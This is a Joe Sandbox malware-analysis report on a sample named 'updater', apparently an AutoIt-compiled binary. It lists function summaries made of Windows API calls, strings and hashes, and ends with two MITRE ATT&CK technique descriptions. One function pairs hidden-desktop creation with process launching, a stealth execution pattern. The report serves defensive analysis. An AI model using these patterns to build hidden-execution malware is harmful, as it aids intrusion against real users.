Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2f7acca1ccb6c2fd11cdebaf1cb30050815acd9c0cf95de2ee2d721067031a50
Instruction ID: f40fbae9a54037dc931f859fb0995230df6ccb5fd696aa83f96fc179eea3b6bd
Opcode Fuzzy Hash: 2f7acca1ccb6c2fd11cdebaf1cb30050815acd9c0cf95de2ee2d721067031a50
Instruction Fuzzy Hash: 1C11B271311208BFEF169E54DC82EFB3B6EEB883A4F114129F9289B290D6319C5087A0

Function 0039722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00312111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031214F
Part of subcall function 00312111: GetStockObject.GDI32(00000011), ref: 00312163
Part of subcall function 00312111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031216D

GetWindowRect.USER32(00000000,?), ref: 00397296
GetSysColor.USER32(00000012), ref: 003972B0

Strings

static, xrefs: 00397273

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: f1a3d5e3d4951c09c787dc3003630d176b4177b5af366ba206d967d7a0c9210d
Instruction ID: 30637c8e06879ba378b67ea0601d49ce3aaabf9c002da229f332bac003ffa4bc
Opcode Fuzzy Hash: f1a3d5e3d4951c09c787dc3003630d176b4177b5af366ba206d967d7a0c9210d
Instruction Fuzzy Hash: 7F21477262420AAFDF0ADFB8CC45AFA7BA8EB09304F014918FD95D3290E735A8509B50

Function 00396F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00396FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00396FD6

Strings

edit, xrefs: 00396FAB

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b27f70122156085a2e08bbd0163f6bc05d840a72b2e3049a2ad4d93c9a96838c
Instruction ID: 2a3f5aa0caec88088a5005cb042e50f968cf1f0cefeed3aea9a72a4842b9b43c
Opcode Fuzzy Hash: b27f70122156085a2e08bbd0163f6bc05d840a72b2e3049a2ad4d93c9a96838c
Instruction Fuzzy Hash: 11118C71502208AFEF129E64EC86EFB3B6EEB05368F114714F966971E0C735DC909B60

Function 00373156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003731C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003731E8

Strings

0, xrefs: 003731BF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 0b7d236fb21c1c1ee647c78dea027f3c8a366533cdd02c283a1227f7683eebec
Instruction ID: 92c6024cd7109fb0ee892693bc2d9d6d20b4cb0303aa2990a806c7a7931d1fd9
Opcode Fuzzy Hash: 0b7d236fb21c1c1ee647c78dea027f3c8a366533cdd02c283a1227f7683eebec
Instruction Fuzzy Hash: 88112635902116EBDB33EA98DC45B9D73BCAB05300F458122E809A7291D738AF04EB90

Function 003134E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0031351D
DestroyWindow.USER32(?,?,00324E61), ref: 00313576

Strings

h:, xrefs: 003134E5

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: h:
API String ID: 2587070983-2924159345
Opcode ID: 94bff7db8cff0da20c66ad3ed07cf5ae38175b3bec8ab46fda5f9bbbf72f6b7b
Instruction ID: 3a32a5b9705ca45fc64298d19ab37784aff856bfa4c1798ddbf71af814e5797a
Opcode Fuzzy Hash: 94bff7db8cff0da20c66ad3ed07cf5ae38175b3bec8ab46fda5f9bbbf72f6b7b
Instruction Fuzzy Hash: F021817460A210CFCB1FDF19F859AA533EAAB49710F01455BE806CB6A0EB30DE80DF40

Function 003828A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003828F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00382921

Strings

<local>, xrefs: 003828E9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 7abf9ddfe16dbc62928aa65968611e33b3cfbc7f5dc75ff7521fc42de72869f4
Instruction ID: 59277d6e6843a39ac859705f09778c2fbfbf08a10dcf47a167089cad29d6c571
Opcode Fuzzy Hash: 7abf9ddfe16dbc62928aa65968611e33b3cfbc7f5dc75ff7521fc42de72869f4
Instruction Fuzzy Hash: 5411A070501325BAEF2A9F518C89EFBFBACFF06751F1081AAF55596500E3706894DBE0

Function 0037D116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0037D180

Strings

L,:, xrefs: 0037D12E
0.0.0.0, xrefs: 0037D18E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0$L,:
API String ID: 856254489-1304297062
Opcode ID: 5a2cf3a6decb3bf7d1d07890f6072cb08ed55c2551a9975d585a828e78156e4d
Instruction ID: 38db3864b8ca348184816cd205fceef2ad09e7a48e51c4e7c4f071f05d4ea39c
Opcode Fuzzy Hash: 5a2cf3a6decb3bf7d1d07890f6072cb08ed55c2551a9975d585a828e78156e4d
Instruction Fuzzy Hash: 75119435600204DFCB19EF14D981E9AB7B9AF89720F51C059F90E5F3A1DA34ED86CB50

Function 016E87D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000), ref: 016E884C

Part of subcall function 016E85B1: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 016E867B
Part of subcall function 016E85B1: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,016E87AA), ref: 016E86BC

Strings

.exe, xrefs: 016E8800
OPEN, xrefs: 016E8845

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Create$DesktopExecuteProcessShell
String ID: .exe$OPEN
API String ID: 1246678638-879745837
Opcode ID: ee274d461465e6ceeab7485ac9224f0bdcd8f312c288ecf7bc8b1e587af37bac
Instruction ID: b76e3bbb3b5f7c30f9c96b2109cc17c240060234e6d537f881076a06f740149b
Opcode Fuzzy Hash: ee274d461465e6ceeab7485ac9224f0bdcd8f312c288ecf7bc8b1e587af37bac
Instruction Fuzzy Hash: 0F012474B043047BE710AAA9DC81F5F72EEEB98B10F12457CBD06E7381DEB49D008169

Function 00388475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 003886E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0038849D,?,00000000,?,?), ref: 003886F7

inet_addr.WSOCK32(00000000), ref: 003884A0
htons.WSOCK32(00000000), ref: 003884DD

Strings

255.255.255.255, xrefs: 003884B8

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 3dec6df7544b3eb6969b46459401bc344e9b65f49bee3815f38aa7df31578dd2
Instruction ID: efa280c4555b6990cfd8879181ed1bdd6fada8bb3521f9a17e0273ad96e8c174
Opcode Fuzzy Hash: 3dec6df7544b3eb6969b46459401bc344e9b65f49bee3815f38aa7df31578dd2
Instruction Fuzzy Hash: 8E11A535100316ABDB11BF64DC46FBEB329FF05320F50855AF9159B291DB72A814C795

Function 003699BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00369A2B

Strings

ListBox, xrefs: 003699F5
ComboBox, xrefs: 003699CA

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: a5844e042d3fb081697ff3386cff6f17c522b38d9c6957f64a54bd67af7e9851
Instruction ID: ee1e891483949693159fa094e3d4ed1d3ee13b11a760b63349eea98663a7d8bb
Opcode Fuzzy Hash: a5844e042d3fb081697ff3386cff6f17c522b38d9c6957f64a54bd67af7e9851
Instruction Fuzzy Hash: D601F571A41128AB8B16FBA4CC51DFEB3ADEF66320B00460AF8619B2C5DA305D088660

Function 0037934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00379367
__fread_nolock.LIBCMT ref: 0037937C

Strings

EA06, xrefs: 003793AE

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 8665be6a3bbeda1a5c0251c6490fe6a0a63f4d2025e2a7895a29f4ea627d777e
Instruction ID: 1422eac59ca93e37a060075f2772652bfc5ae0e8a4a01b6f1224798f666f666b
Opcode Fuzzy Hash: 8665be6a3bbeda1a5c0251c6490fe6a0a63f4d2025e2a7895a29f4ea627d777e
Instruction Fuzzy Hash: DA01F9729042587EEB29C6A8CC56FFEBBFC9B01301F00429FF552D6181E578E6048B60

Function 003698B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00369923

Strings

ListBox, xrefs: 003698ED
ComboBox, xrefs: 003698C2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: e95f11821007123f4cbde71fda52a094a1e31a2e15c9f8e24c90792a2c5fbefd
Instruction ID: c5e323545ace8b07af3b0d549df497c19b229d9f251464bda45269521b5c14d9
Opcode Fuzzy Hash: e95f11821007123f4cbde71fda52a094a1e31a2e15c9f8e24c90792a2c5fbefd
Instruction Fuzzy Hash: 5701F775E811186BCB16FBA0C952FFFB3AC9F25300F10401AB841A7285DA205F0896F1

Function 0036993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0036B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0036B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 003699A6

Strings

ListBox, xrefs: 00369972
ComboBox, xrefs: 00369947

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 2c0aaa52ed0fb98796c2eb47b3ee15cca0e8d54a6f368bcca606328ed7865d8a
Instruction ID: 5fa1f4d49fcfc59c9101818c0ee89988c0e1cbdd02e92607408e587254c3ec3b
Opcode Fuzzy Hash: 2c0aaa52ed0fb98796c2eb47b3ee15cca0e8d54a6f368bcca606328ed7865d8a
Instruction Fuzzy Hash: 7101A772A4111867CB16FBA4CA52FFFB3AC9F21340F14401AB845A7285DA244F0896B1

Function 00336D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00336DC0
__calloc_crt.LIBCMT ref: 00336DD9

Strings

@b=, xrefs: 00336DF0

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __calloc_crt
String ID: @b=
API String ID: 3494438863-2155352550
Opcode ID: c627a2afe18ea084a1bfd6f46273051295008dc0ee29b52460f49779e35ee145
Instruction ID: 9c03ccf43ed324d980f74bc3f43ab5033bea00e2b8ebf535ee8c94ca0be9ba8e
Opcode Fuzzy Hash: c627a2afe18ea084a1bfd6f46273051295008dc0ee29b52460f49779e35ee145
Instruction Fuzzy Hash: 39F04FB2309752AFE72B8B69FD927A52799E720724F51886BF100DE294F73488814684

Function 003754E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00375501
_wcscmp.LIBCMT ref: 00375513

Strings

#32770, xrefs: 0037550D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: e4ab7e9af218a3e164af65e495f8fd738ec9097d3906f7d2af9653c3d4291997
Instruction ID: bcc5b12758c4f64397d97366024716e456b5547e0a3463068474df1972fcea9a
Opcode Fuzzy Hash: e4ab7e9af218a3e164af65e495f8fd738ec9097d3906f7d2af9653c3d4291997
Instruction Fuzzy Hash: E3E0D17250022917D7219759BC45FA7F7ACDB55771F000157FD04D7051D571ED4587D0

Function 00368892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003688A0

Part of subcall function 00333588: _doexit.LIBCMT ref: 00333592

Strings

Error allocating memory., xrefs: 00368899
AutoIt, xrefs: 00368894

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: ed22f70026a44225d5cd3805ebc72ff653fc1bd7db0882e411999ca97a71f252
Instruction ID: 40fb826aec5535b406ddfd04ea388a80f7a11c299ed40941be279db8a473c083
Opcode Fuzzy Hash: ed22f70026a44225d5cd3805ebc72ff653fc1bd7db0882e411999ca97a71f252
Instruction Fuzzy Hash: 31D05B713C535C36D21B33A86C0BFDA7B4CCB07B55F04442AFB08AD1D389D5999042D5

Function 00350251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00350091

Part of subcall function 0038C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0035027A,?), ref: 0038C6E7
Part of subcall function 0038C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00350289

Strings

WIN_XPe, xrefs: 003500A4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: ada96bb75498b434d31b303a7710d4b9f504887c2b22f10ffe0985ba7eee8e95
Instruction ID: 48fec0831fb411495422628bad084a5e194371553f517f297bed3f0c1ab18f5c
Opcode Fuzzy Hash: ada96bb75498b434d31b303a7710d4b9f504887c2b22f10ffe0985ba7eee8e95
Instruction Fuzzy Hash: 43F0C071805109DFCB5BDB51C954BEC7BBCAB48301F141495E546B75A0CB725F88DF21

Function 00325800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

DestroyIcon.USER32(,z=0z=,003D7A2C,003D7890,?,00325A53,003D7A2C,003D7A30,?,00000004), ref: 00325823

Strings

SZ2,z=0z=, xrefs: 00325804
,z=0z=, xrefs: 00325808, 00325821

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: DestroyIcon
String ID: ,z=0z=$SZ2,z=0z=
API String ID: 1234817797-2513326810
Opcode ID: 7c7346adbefbd3c5bd8999e8794ea464e86bbfbed105c08037e7ecb3926e0959
Instruction ID: 549c2eacafd96a900afd50e2aa289c60d98f33e6bc33a9a7156fcf48544f4a6d
Opcode Fuzzy Hash: 7c7346adbefbd3c5bd8999e8794ea464e86bbfbed105c08037e7ecb3926e0959
Instruction Fuzzy Hash: F9E0C232114216EBE7220F08E8007A4FBECAF21721F24C016E08056050D3F169A0DB90

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

